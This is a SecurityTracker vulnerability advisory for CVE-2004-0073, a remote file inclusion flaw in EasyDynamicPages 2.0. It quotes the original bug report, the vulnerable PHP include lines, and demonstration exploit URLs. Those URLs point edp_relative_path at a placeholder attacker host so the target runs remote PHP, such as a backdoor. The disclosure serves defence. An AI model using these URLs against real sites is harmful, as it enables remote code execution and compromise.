SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Your Ad Here
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Forum/Board/Portal)  >  EasyDynamicPages Vendors:  Stoitsov, Mario and Angel
EasyDynamicPages Include File Holes Let Remote Users Execute Arbitrary Commands on the Target System
SecurityTracker Alert ID:  1008584
SecurityTracker URL:  http://securitytracker.com/id?1008584
CVE Reference:  CVE-2004-0073   (Links to External Site)
Updated:  Jul 6 2008
Original Entry Date:  Jan 2 2004
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 2.0
Description:  An include file vulnerability was reported in EasyDynamicPages. A remote user can execute arbitrary PHP code and operating system commands on the target system.

It is reported that the '/admin/config.php' and '/dynamicpages/fast/config_page.php' files include files without validating the included file. A remote user can supply a specially crafted URL to cause a PHP file at a remote location to be included by and executed on the target system.

The report indicates that '/admin/config.php' includes the 'admin/serverdata.php' file. A demonstration exploit URL that will execute the 'http://[attacker]/admin/serverdata.php' file is provided:

http://[target]/admin/config.php/edp_relative_path=http://[attacker]/

The report also indicates that '/dynamicpages/fast/config_page.php' includes the 'admin/site_settings.php' or 'admin/dpage_settings.php' files. A demonstration exploit URL that will execute the 'http://[attacker]/admin/site_settings.php' file is provided:

http://[target]/dynamicpages/fast/config_page.p hp?do=add_page&du=site&edp_relative_path=http://attacker/
Impact:  A remote user can execute arbitrary PHP code, including operating system commands, on the target system. The code and commands will run with the privileges of the target web service.
Solution:  No solution was available at the time of this entry.
Vendor URL:  software.stoitsov.com/ (Links to External Site)
Cause:  Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  Vietnamese Security Group <security@security.com.vn>
Message History:   None.

 Source Message Contents
Date:  2 Jan 2004 15:18:21 -0000
From:  Vietnamese Security Group <security@security.com.vn>
Subject:  include() vuln in EasyDynamicPages v.2.0

 



Producr:EasyDynamicPages v.2.0: Advanced Portal Management System 
Vendors:http://software.stoitsov.com 
Bug :include() 
Risk:Cao 
Author:tsbeginnervn(c) 
Web : www.security.com.vn

------------------------------------- 
Introduction : 
system, personal or business site or what you need. 

The goal is to have an automated web site not only to distribute news and items with automated system
 but also easily to create and
 edit dynamic web pages (DynamicPages) without knowledge of html, php or whether you need to develop 
websites. 

Each user can submit news, comments, discuss articles and more. Registered users and administrators c
an additionally create and modify
 DynamicPages. 

Plugins included with the install are BookMarks manager, E-Publish, E-card and E-gallery systems and 
Yahoo-like E-Classifier system.
 

Features: design/content separation, web admin, user-customizable theme management, SiteConfig manage
r, PageEdit manager, Search engine,
 Left-Right blocks system, editor to add news and for content management, modular DynamicalPages stru
cture, system self install and
 more. 

Written in PHP, works on windows, unix, linux and requires PHP, Apache and MySQL. 


Vuln in files: 
/admin/config.php va /dynamicpages/fast/config_page.php 
================== 

The Code in File /admin/config.php : 

++++++++++++++++++++++++ 
include_once $edp_relative_path."admin/serverdata.php"; 
++++++++++++++++++++++++ 


Exploit: 
http://victim/admin/config.php/edp_relative_path=http://attacker/ 
Voi host cua attacker: 
http://attacker/admin/serverdata.php 

The code in File /dynamicpages/fast/config_page.php : 

++++++++++++++++++++++++ 
$ResultHtml=""; 
if ($do=="add_page") { 
switch($du) { 
case "site": include_once $edp_relative_path."admin/site_settings.php"; break; 
case "dpage": include_once $edp_relative_path."admin/dpage_settings.php"; break; 
++++++++++++++++++++++++ 

Exploit: 
http://victim/dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http://
attacker/ 

If a attacker have Script backdoor in URL :   
http://attacker/admin/site_settings.php 

Then acttacker exploit : 

http://victim/dynamicpages/fast/config_page.php?do=add_page&du=dpage&edp_relative_path=http:/
/attacker/ 


====================================================================

tsbeginnervn - BugSearch
www.security.com.vn


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2007, SecurityGlobal.net LLC